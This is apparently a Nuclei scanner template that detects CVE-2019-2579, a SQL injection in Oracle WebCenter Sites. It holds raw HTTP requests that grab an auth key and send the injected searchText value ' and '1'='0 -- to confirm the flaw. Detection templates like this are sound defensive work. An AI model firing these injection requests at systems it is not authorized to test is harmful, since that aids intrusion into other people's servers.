51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2019-2579
|
|
|
|
info:
|
|
name: Oracle WebCenter Sites - SQL Injection
|
|
author: leovalcante
|
|
severity: medium
|
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
|
reference:
|
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
|
- https://github.com/Leovalcante/wcs_scanner
|
|
tags: cve,cve2019,oracle,wcs,sqli
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 4.30
|
|
cve-id: CVE-2019-2579
|
|
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /cs/ContentServer HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
|
|
|
cookie-reuse: true
|
|
extractors:
|
|
- type: regex
|
|
name: authkey
|
|
part: body
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "value='' and '1'='0 --"
|
|
- "Use this utility to view and manage URLs"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |